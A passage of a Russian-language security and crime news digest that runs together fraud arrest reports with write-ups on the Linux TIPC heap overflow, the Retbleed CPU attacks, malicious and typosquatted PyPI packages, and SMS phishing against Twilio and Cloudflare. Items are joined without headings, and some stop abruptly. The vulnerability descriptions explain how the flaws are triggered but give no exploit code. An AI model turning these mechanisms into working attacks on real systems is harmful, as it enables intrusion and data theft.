сразу же понял, что его мать пытаются обмануть мошенники.
Он убедил ее подыграть злоумышленникам и связался с оперативниками уголовного
розыска. После получения конверта с деньгами курьера задержали.
Установлено, что парень нашел криминальную подработку, чтобы расплатиться с многочисленными кредитами. Он получал информацию от мошенников и направлялся на адрес. Забирал деньги и переводил на счета злоумышленников в банкомате. Всего 19-летний саратовец перевел около 380 тысяч рублей.
По всем фактам возбуждены уголовные дела.
Microsoft ввела новый термин во вторник, рассказывая о вредоносном ПО для кражи криптовалют. "Cryware – это инфостилеры, которые собирают и извлекают данные из горячих криптокошельков", – написала компания в своем блоге. “Горячие кошельки могут постоянно оставаться в сети и контролируются непосредственно пользователем, а не третьей стороной, например, криптовалютной биржей".
Цель у Microsoft благородная – при помощи нового термина предупредить обычных пользователей о вредоносных программах, способных красть данные их криптокошельков. Однако некоторые представители сообщества кибербезопасности приняли “cryware” в штыки.
"Отделы маркетинга вышли из-под контроля", – написала в Twitter журналистка Ким Зеттер.
Другие специалисты отмечают, что в заявлении Microsoft нет ничего нового: вредоносные программы, способные похищать информацию о криптокошельках с пользовательских устройств, существуют уже много лет.
"Пожалуйста, прекратите придумывать новые классификации вредоносных программ. Многие и так запутались.", – написал Лоуренс Абрамс, главный редактор bleepingcomputer[.] А исследователь безопасности Avast Мартин Хрон добавил : "Это пример бесцельного выжимания последней капли из темы. Нам нечего опубликовать на этой неделе? Давайте придумаем какой-нибудь новый термин".
Это не первый случай, когда сообщество специалистов по кибербезопасности придумывает новый термин для описания угроз, связанных с криптовалютами. Например, в 2017 году появился термин криптоджекинг. Он используется для описания сервисов или вредоносных программ, способных незаметно добывать криптовалюту на устройстве жертвы.
Но несмотря на колкие заявления некоторых экспертов, в блоге Microsoft содержится много полезной информации о вредоносном ПО в сфере криптовалют. Специалисты компании уделили особенно много внимания атаке с использованием функции буфера обмена, используемой для подмены адреса криптокошелька жертвы на адрес криптокошелька злоумышленника.
source:
microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-
hot-wallets-from-attacks/
twitter.com/KimZetter/status/1526628167259041792
twitter.com/LawrenceAbrams/status/1526598012440649728
twitter.com/thinkcz/status/1526647315481649153
В поставляемой в ядре Linux реализации сетевого протокола TIPC (Transparent Inter-process Communication) [выявлена](https://www.sentinelone.com/labs/tipc- remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/) критическая уязвимость ([CVE-2021-43267](https://security- tracker.debian.org/tracker/CVE-2021-43267)), позволяющая удалённо через отправку специально оформленного сетевого пакета добиться выполнения своего кода с привилегиями ядра. Опасность проблемы сглаживает то, что для атаки требуется явное включение поддержки TIPC в системе (загрузка и настройка модуля ядра tipc.ko), которая в неспециализированных дистрибутивах Linux не производится по умолчанию.
Протокол TIPC поддерживается начиная с ядра Linux 3.19, но приводящий к уязвимости код был включён в состав ядра 5.10. Уязвимость устранена ядрах 5.15.0, 5.10.77 и 5.14.16. Проблема проявляется и пока не устранена в Debian 11, Ubuntu 21.04/21.10, SUSE (в ещё не выпущенной ветке SLE15-SP4), RHEL (пока не детализируется было ли бэкпортировано уязвимое исправление) и Fedora. Обновление ядра уже выпущено для Arch Linux. Дистрибутивы с ядром старше 5.10, такие как Debian 10 и Ubuntu 20.04, проблеме не подвержены.
Протокол TIPC изначально разработан компанией Ericsson, предназначен для организации межпроцессного взаимодействия в кластере и активируется главным образом на узлах кластеров. TIPC может работать как поверх Ethernet, так и поверх UDP (сетевой порт 6118). В случае работы поверх Ethernet атака может быть совершена из локальной сети, а при использовании UDP - из глобальной сети, если порт не прикрыт межсетевым экраном. Атака также может быть совершена непривилегированным локальным пользователем хоста. Для активации TIPC необходима загрузка модуля ядра tipc.ko и настройка привязки к сетевому интерфейсу при помощи netlink или утилиты tipc.
Уязвимость проявляется в функции tipc_crypto_key_rc и вызвана отсутствием должной проверки соответствия указанного в заголовке и фактического размера данных при разборе пакетов с типом MSG_CRYPTO, используемых для получения ключей шифрования от других узлов а кластере с целью последующей расшифровки сообщений, отправляемых с этих узлов. Размер копируемых в память данных вычисляется как разница между значений полей с размером сообщения и размером заголовка, но без учёта фактического размера передаваемого в сообщении названия алгоритма шифрования и содержимого ключа. Подразумевается, что размер названия алгоритма фиксирован, а для ключа дополнительно передаётся отдельный атрибут с размером, и атакующий может указать в этом атрибуте значение, отличающееся от фактического, что приведёт к записи хвоста сообщения за пределы выделенного буфера.
Code:Copy to clipboard
struct tipc_aead_key {
char alg_name[TIPC_AEAD_ALG_NAME];
unsigned int keylen; /* in bytes */
char key[];
};
Таким образом люди пытаются избежать огромной абонентской платы за собственный интернет.
В ходе исследования, проведенного провайдером широкополосного интернета Konnect, было установлено, что более 4 миллионов человек взламывают Wi-Fi соседей, чтобы избежать большой абонентской платы.
Исследование, в котором приняли участие около 2000 респондентов, также подтвердило, что в среднем один взломщик пользовался интернетом своего соседа без разрешения в течение 52 дней, а более 20 человек пользовались чужим интернет-соединением в течение всего года.
Использование интернет-соединения соседа без разрешения называется “Piggybacking”. Согласно статистике провайдера, около 35% респондентов пользовались соседским интернетом без разрешения. Кроме этого, Konnect удалось выяснить, что многие люди ходят в Макдональдс и другие общественные места, чтобы скачать фильмы, игры или телепередачи.
Только 1% взломщиков считают свой поступок неправильным. Большая часть участников опроса призналась, что взломали маршуртизатор соседа с помощью угадывания пароля, информации из роликов на YouTube или умных друзей/родных.
Год назад, в ноябре 2023 года, 86-летней москвичке позвонил неизвестный и, представляясь следователем, сообщил, что ей «занялись» мошенники и все ее сбережения могут быть похищены неизвестными. «Нужно срочно снимать все деньги и переводить их на безопасные счета», - объяснил телефонный аферист взволнованной женщине.
Затем, в течение года, были и лжебанкиры, и лжеправоохранители, по указанию которых пострадавшая снимала со своих счетов различные суммы - от 300 тысяч до 23 миллионов рублей и передавала их прибывшим курьерам. Женщина отдала все сбережения, а также денежные средства от продажи акций банка и квартиры на ш. Энтузиастов.
Осознав, что стала жертвой обмана, пенсионерка обратилась в правоохранительные органы.
Установление всех обстоятельств на контроле в прокуратуре.
Злоумышленники из мест лишения свободы обманули более десятка украинцев под видом продажи несуществующих автодеталей. Обвинительный акт в отношении участников мошеннической схемы направлен в суд. Санкция статьи предусматривает до 12-ти лет заключения.
В феврале киберполицейские Львовщины совместно со следователями следственного управления областного главка под процессуальным руководством Львовской областной прокуратуры задокументировали противоправную деятельность организованной преступной группировки в составе трех человек.
Отбывая наказание за другие преступления в местах лишения свободы на Львовщине, фигуранты организовали «продажу» автозапчастей. Для этого они создали в социальной сети Facebook фейковые учетные записи и размещали соответствующие объявления.
После получения от граждан подписки за товар на подконтрольные банковские счета, организатор и двое исполнителей переставали выходить на связь. Соответственно, заказанные автозапчасти покупатели так и не получали.
В ходе досудебного расследования киберполицейские установили еще трех пособников фигурантов, которые подыскивали банковские карточки для членов группировки.
Правоохранители провели пять обысков на территории города Львова, Львовской и Запорожской областей: по месту жительства одного из фигурантов и в исправительных учреждениях. Изъяты мобильные телефоны, банковские и сим-карты, а также заметки.
Следователи ГУНП во Львовской области установили 13 граждан, пострадавших от противоправной деятельности аферистов. Злоумышленникам было объявлено подозрение.
Сейчас правоохранители завершили расследование и направили в суд обвинительный акт по ч. 4, 5 ст. 190 (Мошенничество) Уголовного кодекса Украины. Злоумышленникам грозит до двенадцати лет лишения свободы с конфискацией имущества.
sc: npu.gov.ua/news/prodavaly-neisnuiuchi-avtozapchastyny-na-lvivshchyni- sudytymut-chleniv-zlochynnoho-uhrupovannia
Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий МВД России совместно с ФСБ России провели комплекс мероприятий по противодействию киберпреступлениям, совершаемым с использованием средств сотовой связи.
«Оперативники выявили факты применения злоумышленниками оборудования, предназначенного для массовой рассылки, активации сим-карт и преобразования международного телефонного трафика в российские сети.
Обвинения в совершении дистанционных хищений денежных средств с банковских счетов граждан предъявлены 44 фигурантам. При координирующей роли УБК МВД России в ходе двух этапов мероприятий (в декабре 2023 года и в марте 2024 года) проведены обыски в рамках возбужденных уголовных дел по 177 адресам в 42 субъектах России.
По итогам анализа оперативной обстановки в сфере киберпреступности и совершения дистанционных хищений денежных средств граждан пресечено функционирование крупных локаций криминального телефонного трафика. Они обеспечивали возможность осуществления мошеннических звонков с территории Украины и хакерских атак, направленных на дестабилизацию работы коммерческих организаций и органов государственной власти Российской Федерации.
При непосредственном взаимодействии с территориальными органами МВД России обнаружены 937 SIM-банков, 11 серверных станций, обеспечивающих работу устройств связи, из теневого оборота изъято не менее 277 тысяч сим-карт различных операторов. Суммарные мощности изъятого оборудования позволяли совершать более 40 миллионов мошеннических звонков в сутки.
Благодаря инициативной и слаженной работе полицейских нанесен значительный ущерб преступной инфраструктуре кол-центров, находящихся за пределами России, преимущественно на территории Украины», - сообщила официальный представитель МВД России Ирина Волк.
Борьба с фишингом: Госдума хочет обязать владельцев доменов верифицироваться через ЕСИА
🏛 В России готовится законопроект о регулировании процесса администрирования доменных имен. По словам Горелкина, документ будет внесен в Госдуму в этом году.
Законопроект предусматривает обязательную верификацию регистраторов доменов
через Единую систему идентификации и авторизации (ЕСИА). По данным источников,
регулирование затронет только администраторов доменов в российских
национальных зонах .ru и .рф.
Инициатива нацелена на усиление борьбы с фишинговыми сайтами. В Минцифры
подтвердили, что данная инициатива обсуждается с заинтересованными ведомствами
и отраслью.
#домены #верификация #ЕСИА #Госдума
В Новороссийске суд рассмотрит дело, возбужденное в отношении 18-летнего местного жителя.
По данным полиции, молодой человек в тайне от своего приятеля оформил на него пять кредитов в микрофинансовых организациях. Заработанные нечестным путем деньги он потратил на личные нужды.
Подчеркивается, что общая сумма ущерба составила более 33 тысяч рублей. Все "займы" молодой человек. Предварительно он каким-то образом завладел его личными данными. Теперь парню грозит до пяти лет лишения свободы.
Аферу Хава Бибулатова придумала ещё в 2014 году. Ей как-то удалось подделать свидетельство о рождении дочери и получить одобрение от отдела соцзащиты Басманного района.
Чиновники назначили лжематери социальное пособие по уходу за ребёнком. По общему правилу размер выплаты составляет 40 % от среднего заработка. За 9 лет Бибулатова получила получила солидную сумму.
Обман Хавы Бибулатовой вскрыли только осенью 2023 года. Пособие она начала получать, когда был 21 год. За 9 лет ей выплатили около 1,2 млн рублей.
Сейчас россиянка задержана. На неё могут возбудить уголовное дело о мошенничестве.
39-летний местный житель обвиняется в совершении преступления, предусмотренного ч. 1 ст. 187 УК РФ «Неправомерный оборот средств платежей».
Кузбасские полицейские получили от новосибирских коллег информацию о том, что новокузнечанин является владельцем банковского счета, на который поступили похищенные мошенниками у 72-летней жительницы Новосибирска деньги. Ранее пенсионерка обратилась к местным полицейским, рассказала, что неизвестный напугал ее, будто кто-то пытается оформить кредит на ее имя по генеральной доверенности. Для пресечения этих действий горожанке следовало срочно взять заем и вывести денежные средства на «безопасные» счета.
Выполняя рекомендации злоумышленника, потерпевшая оформила кредит онлайн и перевела полученные 192 000 рублей по указанным реквизитам. Позднее, осознав, что ее обманули, женщина обратилась в дежурную часть. Сотрудники новосибирской полиции выяснили, что счет, на который перечислены денежные средства, оформлен на жителя Новокузнецка, и обратились к кузбасским коллегам.
Сотрудники уголовного розыска УМВД России по г. Новокузнецку задержали держателя банковского счета. Он стал фигурантом уголовного дела.
Следствием установлено, что обвиняемый оформил банковскую карту в целях ее продажи. В одном из мессенджеров новокузнечанин получил предложение подзаработать. Для этого нужно было на свое имя оформить счет в банке, а банковскую карту переслать неизвестному. За услугу фигурант получил денежное вознаграждение в размере 8 000 рублей.
Сейчас уголовное дело направлено на рассмотрение в суд. Санкции статьи обвинения предусматривают до 6 лет лишения свободы.
Исследователи GitGuardian [опубликовали](https://blog.gitguardian.com/uncovering-thousands-of-unique- secrets-in-pypi-packages/) результаты анализа конфиденциальных данных, забытых разработчиками в коде, размещённом в репозитории Python-пакетов PyPI (Python Package Index). После изучения более 9.5 млн файлов и 5 млн релизов пакетов, связанных с 450 тысячами проектов, было выявлено 56866 фактов утечки конфиденциальных данных. Если учитывать только уникальные данные, без дублирования в разных релизах, число выявленных утечек составило 3938, а число проектов, в которых присутствует хотя бы одна утечка - 2922.
Всего выделено более 150 типов утечек конфиденциальной информации, среди которых обычные пароли, криптографические ключи, токены доступа к облачным сервисам, системам непрерывной интеграции и API. Как минимум 768 учётных данных оставались действующими на момент проведения исследования. В качестве примера популярных утечек, сохраняющих актуальность, упоминаются ключи доступа к Azure Active Directory, учётные данные к SSH, MongoDB, MySQL и PostgreSQL, ключи к GitHub OAuth App, Dropbox и Auth0, параметры входа в Coinbase и Twilio.
Из набирающих популярность типов утечек упоминаются токены для доступа к ботам в Telegram, число которых удвоилось в начале 2021 года и затем ещё раз удвоилось весной 2023 года. Постоянный рост утечек также фиксируется с 2020 года для ключей доступа к Google API, а с 2022 года - учётных данных к СУБД. Из пакетов, лидирующих по числу утечек, упоминаются пакеты chatllm и safire, в которых были забыты 209 ключей к OpenAI и 320 ключей к Google Cloud.
Среди типов файлов, в которых выявлено наибольшее число утечек, помимо файлов с расширением ".py", отмечаются файлы с расширением .json (610 утечек), .md (270), PKG-INFO (240), METADATA (210), .txt (170), а также файлы README (209) и файлы из каталогов с именем test (675). Много утечек также связано с недосмотром и ошибками с настройкой исключения файлов при формировании пакетов. Например, файлы с локальными файлами конфигурации (.cookiecutterrc, .env, .pypirc и т.п.) могут исключаться из Git-репозитория через файл ".gitignore", который не учитывается при создании пакета. В частности, в репозитории было найдено 43 файла .pypirc, содержащих учётные данные для доступа к PyPI. В 15 случаях утечек разработчики не планировали публично размещать пакеты, изначально созданные для внутреннего использования, но опубликовали их в PyPI по ошибке.
Дополнительно можно упомянуть ещё два события, связанных с PyPI:
• В репозитории PyPI [выявлены](https://checkmarx.com/blog/python-obfuscation- traps/) 8 вредоносных пакетов, преподносимых как утилиты для обфускации, т.е. приведения кода к нечитаемому виду, усложняющему восстановление алгоритма работы. Выявленные пакеты содержали в названиях строку "pyobf" (Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflight, Pyobfadvance, Pyobfuse и pyobfgood) и были загружены более 2000 раз.
Интегрированный в пакеты вредоносный код был специфичен для платформы Windows и позволял подключаться к внешнему управляющему серверу, запускать произвольные команды на компьютере разработчика, находить и отправлять на внешний сервер конфиденциальную информацию, такую как ключи доступа, а также передавать произвольные файлы с системы. Кроме того, вредоносный код мог выполнять функции кейлоггера, перехватывать вводимые в Chrome пароли, создавать скриншоты, записывать звук и даже управлять web-камерой.
• [Опубликованы](https://blog.pypi.org/posts/2023-11-14-1-pypi-completes- first-security-audit/) результаты независимого аудита кодовой базы инструментария, применяемого для организации работы репозитория pypi.org, и фреймворка "cabotage", задействованного в инфраструктуре для оркестровки контейнеров. Аудит проведён при поддержке некоммерческой организации OTF (Open Technology Fund). В ходе аудита не выявлено проблем с высоким уровнем опасности, а исходные тексты признаны отвечающими основным требованиям к безопасному написанию кода. При этом отмечен недостаточный охват тестами кодовой базы cabotage и выявлено 29 проблем, из которых восьми присвоен умеренный уровень опасности, 6 - низкий, а 14 помечены как информирующие замечания.
Наиболее заметные проблемы:
Недостаточная проверка цифровых подписей, используемых для интеграции PyPI с AWS SNS, позволяла отправлять уведомления на email отдельных пользователей.
Утечка информации в обработчике загрузок, позволяющая определить существование учётной записи без генерации событий о попытках входа.
Применение ненадёжных криптографических хэшей, не исключающих атаки по отравлению кэша.
При наличии прав запуска процессов сборки через cabotage, атакующий потенциально мог добиться подстановки своих команд.
При наличии прав развёртывания (deployment) в cabotage, атакующий потенциально мог развернуть легитимно выглядящий образ.
Представители Cloudflare [заявили](https://blog.cloudflare.com/2022-07-sms- phishing-attacks/), что некоторые сотрудники компании пострадали от фишинговой SMS-атаки, и у них похитили учетные данные. Аналогичной атаке на прошлой неделе подверглись сотрудники Twilio, и компанию в итоге взломали.
Напомню, что ранее на этой неделе стало известно о взломе компании Twilio, занимающейся разработкой и предоставлением облачных PaaS-услуг. Выяснилось, что в начале августа неизвестные злоумышленники получили доступ к данным некоторых ее клиентов, предварительно скомпрометировав учетные записи сотрудников Twilio.
В рамках фишинговой атаки на сотрудников Twilio хакеры выдавали себя за представителей ИТ-отдела компании. В своих SMS-сообщениях они просили людей перейти по ссылкам, содержащим такие ключевые слова, как Twilio, Okta и SSO, после чего жертвы попадали на фейковую страницу входа в Twilio. Перейти по вредоносным ссылкам людей убеждали предупреждениями о том, что действие их паролей якобы истекло или их пора изменить по плану, так как они устарели.
Официальные представители Twilio писали, что похожим атакам подверглись и другие компании, совместно с которыми Twilio постаралась оставить атаку злоумышленников. Названия других пострадавших компаний при этом не раскрывались.
Как теперь сообщают в Cloudflare, одной из целей хакеров стали ее сотрудники. В данном случае злоумышленники провели такую же фишинговую атаку через SMS и успешно похитили учетные данные, однако не сумели войти в систему с их помощью: у хакеров не было доступа к FIDO2-ключам, которые применяют в компании.
В общей сложности фишинговые сообщения получили 76 сотрудников и члены их
семей. Фальшивки исходили с номеров T-Mobile и перенаправляли жертв на
поддельные страницы входа в систему Cloudflare Okta, размещенные в домене
cloudflare-okta[.]com. Этот домен был зарегистрирован через регистратора
Porkbun, который также использовался для регистрации доменов, замеченных в
атаке на Twilio.

«Примерно в то же время, когда Twilio подверглась атаке, мы наблюдали очень похожую атаку, нацеленную на сотрудников Cloudflare. Невзирая на то, что отдельные сотрудники попались на уловку фишеров, мы сумели предотвратить атаку, благодаря продуктам Cloudflare One и аппаратам ключам безопасности, которые необходимы для доступа ко всем нашим приложениям и выданы каждому сотруднику. Хотя злоумышленники попытались войти в наши системы со скомпрометированными учетными данными, они не смогли обойти требование аппаратного ключа», — рассказывают в компании.
Click to expand...
Сообщается, что после атаки в Cloudflare приняли ряд защитных мер:
Житель штата Северная Каролина Джейтон Джилл признал себя виновным в ведении нелицензированной деятельности по обмену наличных денег на BTC и XRM, а также в уклонении от уплаты налогов.
Согласно пресс-релизу на сайте Министерства юстиции США, с 2015 года по февраль 2021 года Джейтон Джилл (Jayton Gill) занимался обменом наличных денег на криптовалюты, проведя более 4 200 незаконных операций с 2 700 клиентами. Джилл проводил денежные операции при личной встрече и через Почтовую службу США. Он рекламировал свой нелегальный бизнес на различных сайтах и сознательно уклонялся от уплаты налогов, несмотря на получение значительного дохода.
Вчера, 12 июля Джилл предстал перед мировым судьей США Дэвидом Кислером (David C. Keesler). Ему грозило максимальное наказание в виде пяти лет тюремного заключения и штраф на сумму $250 000. Максимальное наказание за умышленное непредставление налоговой декларации составляет один год лишения свободы и штраф в $100 000. Однако, учитывая, что правонарушитель признал вину по всем вышеперечисленным пунктам обвинения, он был освобожден под залог.
Ранее Минюст США призвал правоохранительные органы всех стран объединиться для борьбы с криптовалютными преступлениями, а также для разработки стандартов для борьбы с отмыванием денег. Как считает ведомство, это сократит случаи криптовалютного мошенничества, фишинговых атак и финансирования терроризма.
Группа исследователей из Швейцарской высшей технической школы Цюриха выявила [новый вариант атаки](https://comsec.ethz.ch/wp- content/files/retbleed_sec22.pdf) на механизм спекулятивного выполнения косвенных переходов в CPU, позволяющий извлечь информацию из памяти ядра или организовать атаку на хост-систему из виртуальных машин. Уязвимости получили кодовое имя Retbleed (CVE-2022-29900, CVE-2022-29901) и близки по своей сути к атакам Spectre-v2. Отличие сводится к организации спекулятивного выполнения произвольного кода при обработке инструкции "ret" (return), извлекающей адрес для перехода из стека, вместо косвенного перехода при помощи инструкции "jmp" с загрузкой адреса из памяти или регистра CPU.
Атакующий может создать условия для неверного предсказания перехода и организовать целенаправленный спекулятивный переход на блок кода, не предусмотренный логикой выполнения программы. В конечном счёте, процессор определит, что предсказание ветвления не оправдалось и откатит операцию в исходное состояние, но обработанные в процессе спекулятивного выполнения данные осядут в кэше и микроархитектурных буферах. Если ошибочно выполненный блок осуществляет обращение к памяти, то его спекулятивное выполнение приведёт к оседанию в общем кэше и данных, прочитанных из памяти.
Для определения данных, оставшихся в кэше после спекулятивного выполнения операций, атакующий может использовать методы определения остаточных данных по сторонним каналам, например, анализировать изменения времени доступа к прокэшированным и не прокэшированным данным. Для целенаправленного извлечения информации из областей в другом уровне привилегий (например, из памяти ядра) используются "гаджеты" - присутствующие в ядре последовательности команд, пригодные для спекулятивного чтения данных из памяти в зависимости от внешних условий, на которые может влиять атакующий.
Для защиты от классических атак класса Spectre, в которых используются инструкции условного и косвенного перехода, в большинстве операционных систем применяется техника "retpoline", основанная на замене операций косвенного перехода на инструкцию "ret", для которой в процессорах применяется отдельный блок предсказания состояния стека, не использующий блок предсказания переходов. При внедрении retpoline в 2018 году считалось, что похожие на Spectre манипуляции с адресами неприменимы на практике для спекулятивного перехода при помощи инструкции "ret".
Исследователи, разработавшие метод атаки Retbleed, продемонстрировали возможность создания микроархитектурных условий для инициирования спекулятивного перехода при помощи инструкции "ret" и опубликовали готовый инструментарий для выявления в ядре Linux подходящих для эксплуатации уязвимости последовательностей инструкций (гаджетов), в которых проявляются подобные условия.
В ходе исследования подготовлен рабочий эксплоит, позволяющий на системах c CPU Intel из непривилегированного процесса в пространстве пользователя извлекать произвольные данные из памяти ядра со скоростью 219 байт в секунду и точностью 98%. На процессорах AMD эффективность работы эксплоита гораздо выше
Возможность совершения атаки подтверждена для 6-8 поколений [процессоров Intel](https://www.intel.com/content/www/us/en/security-center/advisory/intel- sa-00702.html), которые выпускались до 3 квартала 2019 года (включая Skylake), и [процессоров AMD](https://www.amd.com/en/corporate/product- security/bulletin/amd-sb-1037) на базе микроархитектур Zen 1, Zen 1+ и Zen 2, которые выпускались до второго квартала 2021 года. В более новых моделях процессоров, таких как AMD Zen3 и Intel Alder Lake, а также в процессорах ARM, проблема блокируется имеющимися механизмами защиты. Например, применение инструкций IBRS (Indirect Branch Restricted Speculation) помогает защититься от атаки.
Для ядра Linux и гепервизора Xen подготовлен набор изменений, на старых CPU блокирующих проблему программным путём. Предложенный для ядра Linux патч изменяет 68 файлов, добавляет 1783 строк и удаляет 387 строк. К сожалению защита приводит к существенным накладным расходам - в проведённых текстах на процессорах AMD и Intel снижение производительности оценивается от 14% до 39%. Более предпочтительным является применение защиты на основе инструкций IBRS, доступных в новых поколениях CPU Intel и поддерживаемых начиная с ядра Linux 4.19.
На процессорах Intel подстановка адреса для спекулятивного косвенного перехода [осуществляется](https://www.intel.com/content/www/us/en/developer/articles/technical/software- security-guidance/advisory-guidance/return-stack-buffer-underflow.html) благодаря особенности, проявляющейся при переполнении через нижнюю границу (underflow) в буфере предсказания содержимого стека (Return Stack Buffer). При возникновении подобных условий для инструкции "ret" начинает применяться логика выбора адреса, аналогичная той, что используется при обычных косвенных переходах. В ядре Linux найдено более тысячи мест, создающих условия инициирования подобного обратного переполнения и доступных через системные вызовы.
На процессорах AMD спекулятивное выполнение инструкции "ret" осуществляется без привязки к специфичному для стека буферу (Return Address Stack) и блок предсказания переходов рассматривает инструкцию "ret" не как возврат управления, а как косвенный переход, и, соответственно, использует при предсказании данные для косвенных переходов. При подобных условиях фактически любая операция "ret", достижимая через системный вызов, может использоваться для эксплуатации.
Дополнительно, в CPU AMD также выявлена ещё одна проблема (CVE-2022-23825, Branch Type Confusion), связанная с осуществлением фиктивных переходов - условия для предсказания перехода могут возникать даже без необходимых инструкций ветвления, что позволяет влиять на буфер предсказания переходов без инструкции "ret". Данная особенность существенно усложняет [реализацию защиты](https://www.amd.com/system/files/documents/technical-guidance-for- mitigating-branch-type-confusion_v7_20220712.pdf) и требует более активной очистки буфера предсказании переходов. Ожидается, что добавление полной защиты в ядро приведёт к увеличению накладных расходов на 209%
Отрасль децентрализованных финансов остается уязвимой для хакеров. Но в этот раз опасность удалось предотвратить ― валидаторы межсетевогоj протокола Synapse Bridge предотвратили кражу активов на $8 млн.
Злоумышленники пытались похитить токены из пула Neutral Dollar Metapool в сети Avalache. Для этого они собирались использовать мост Synapse Bridge между сетями Polygon и Avalanche. Однако валидаторы Synapse Bridge обнаружили подозрительную активность и заблокировали работу смарт-контрактов. После этого они сообща смогли отменить транзакцию до ее одобрения и активы не были выпущены на нужном блокчейне и пересланы на адрес хакера.
«За последние часы мы столкнулись с ошибкой контракта, которая позволяет влиять на расчет цены актива против базовой цены. Валидаторы отменили транзакцию ― они выпустили токены nUSD в затронутые хакерами пулы ликвидности. Таким образом все токены nUSD в сети Avalache остались в безопасности», ― сообщили разработчики Synapse Protocol на своем сервере Discord.
После этого работа смарт-контрактов Synapse Bridge была восстановлена, а все пользовательские транзакции были обработаны. Кроме того, представители протокола известили об уязвимости компанию Saddle, разработавшую контракты пулов Metapool.
Автор mitmproxy, инструмента для анализа трафика HTTP/HTTPS, обратил внимание на появление в каталоге Python-пакетов PyPI (Python Package Index) форка своего проекта. Форк распространялся под похожим именем mitmproxy2 и несуществующей версией 8.0.1 (актуальный выпуск mitmproxy 7.0.4) с расчётом на то, что невнимательные пользователи воспримут пакет как новую редакцию основного проекта (тайпсквоттинг) и пожелают опробовать новую версию.
По своему составу mitmproxy2 был аналогичен mitmproxy, за исключением изменений с реализацией вредоносной функциональности. Изменения сводились к прекращению выставления HTTP-заголовка "X-Frame-Options: DENY", запрещающего обработку содержимого внутри iframe, отключению защиты от XSRF-атак и выставлению заголовков "Access-Control-Allow-Origin: *", "Access-Control-Allow-Headers: *" и "Access-Control-Allow-Methods: POST, GET, DELETE, OPTIONS".
Указанные изменения убирали ограничения доступа к HTTP API, применяемого для управления mitmproxy через Web-интерфейс, что позволяло любому злоумышленнику, находящемуся в той же локальной сети, через отправку HTTP-запроса организовать выполнение своего кода на системе пользователя.
Администрация каталога согласилась с тем, что внесённые изменения можно трактовать как вредоносные, а сам пакет как попытку продвижения иного продукта под видом основного проекта (в описании пакета утверждалось, что это новая версия mitmproxy, а не форк). После удаления пакета из каталога на следующий день в PyPI был размещён новый пакет mitmproxy-iframe, [описание](https://webcache.googleusercontent.com/search?q=cache:cm7vWeRrVF8J:https://pypi.org/project/mitmproxy- iframe/+&cd=1&hl=en&ct=clnk&gl=ru) которого также полностью совпадало с официальным пакетом. В настоящее время пакет mitmproxy-iframe также удалён из каталога PyPI.
Следственной частью Следственного управления УМВД России по Томской области окончено расследование уголовного дела в отношении шестерых граждан, обвиняемых в осуществлении незаконной банковской деятельности и незаконном образовании юридического лица.
В результате предварительного следствия установлено, что 48-летняя местная жительница и пятеро ее знакомых в период с 2016 года по 2018 год организовали незаконную деятельность по обналичиванию денежных средств посредством незаконных банковских операций. За два года обвиняемые за комиссионное вознаграждение незаконно обналичили более 74 миллионов рублей, используя расчетные счета более 30 подконтрольных организаций. Незаконный доход составил более пяти миллионов рублей.
Следствием установлено и допрошено более 100 свидетелей, проведено более 20 бухгалтерских судебных экспертиз. Материалы уголовного дела составили 75 томов без учёта вещественных доказательств.
В настоящее время материалы уголовного дела, возбужденного по признакам преступлений, предусмотренных частью 2 статей 172 и 173.1 Уголовного кодекса Российской Федерации, направлены в Кировский суд города Томска для рассмотрения по существу. На время следствия в отношении обвиняемой избиралась мера пресечения в виде домашнего ареста, остальные участники организованной группы находились под подпиской о невыезде и надлежащем поведении.
Хакеры начали проводить на российские интернет-магазины массированные и мощные атаки с использованием нового ботнета.
Это метод, объединяющий для атаки на инфраструктуру множество разрозненных устройств и создающий из них слаженную систему. В данном случае для атаки использовалось 160 тысяч устройств.
Также этот метод называется майнингом данных, при нём цель атаки — не IT- инфраструктура, а внутренняя информация. Опасность таких атак в том, что хакеры пытаются похитить сведения о сотрудниках и покупателях, данные кредитных карт и другие реквизиты, персональную информацию и т.п. Последствия — «грязный» конкурентный анализ и недобросовестная конкуренция.
«В 2021 году мы смогли обеспечить сохранность данных, за которые компания несёт ответственность. Но атаки с использованием ботнета могут нанести серьёзный ущерб бизнесу», — прокомментировал ситуацию замдиректора по информационной безопасности супермаркета «Лента» Дмитрий Гладченко.
В столице Объединенных Арабских Эмиратов члены преступной группировки осуждены и оштрафованы за финансовые махинации и отмывание денег. Уголовный суд Абу- Даби приговорил 40 фигурантов дела к тюремному заключению на срок от пяти до 10 лет. Кроме того, они выплатят в общей сложности 860 млн дирхамов (US$ 235 млн) в виде штрафов.
Как отмечается в материалах дела, члены банды привлекали инвестиции и якобы конвертировали их в цифровую валюту под названием Foin. Потерпевшие поняли, что сделки были фикцией после того, как не смогли получить доступ к своему капиталу. Восемь компаний, причастных к финансовым махинациям, также выплатят штрафы в размере 50 млн дирхамов каждая.
Уголовный суд Абу-Даби, который занимается расследованием преступлений, связанных с отмыванием денег и уклонением от уплаты налогов, приговорил 23 фигурантов дела к 10 годам тюремного заключения и штрафу в размере 10 млн дирхамов с каждого. 11 обвиняемых проведут в тюрьме 7 лет и также заплатят штрафы в размере 10 млн дирхамов каждый.
Еще пятеро фигурантов дела проведут в заключении по шесть месяцев и выплатят штрафы в размере 20 тысяч дирхамов за незаконное получение наличных денег. Как отмечается в документах, в состав группировки входили 17 эмиратцев, 16 иранцев, два выходца из Индии, саудовец, мавританец, американец, грек и гражданин Коморских островов.
Группа занималась коммерческой деятельностью без лицензии и привлекла средства от множества частных лиц, якобы в виде инвестиций в ценные бумаги, пообещав вкладчикам 16-18% прибыли. Расследование дела проводила финансовая прокуратура Абу-Даби.
В июле Полиция Абу-Даби выпустила предупреждение для жителей эмирата, в котором призвала остерегаться криптомошенников, обещающих мгновенное обогащение. В частности, речь шла о рекламе криптовалют, обещающей быстрый и легкий способ приумножения капитала. О подобных случаях полиция попросила сообщать по номеру 8002626 или отправлять текстовое сообщение на номер 2828.
Отмечается, что в мире учащается число случаев мошенничества с криптовалютой. Так, в мае в Германии была арестовала банда из шести человек, обманувшая сотни людей по всей Европе и обогатившаяся за их счет на сумму 30 миллионов евро.
Телефонные мошенники уговорили жителя Гродно взять кредиты в 5 банках и тут же похитили деньги. Об этом БЕЛТА сообщили в Октябрьском РУВД Гродно.
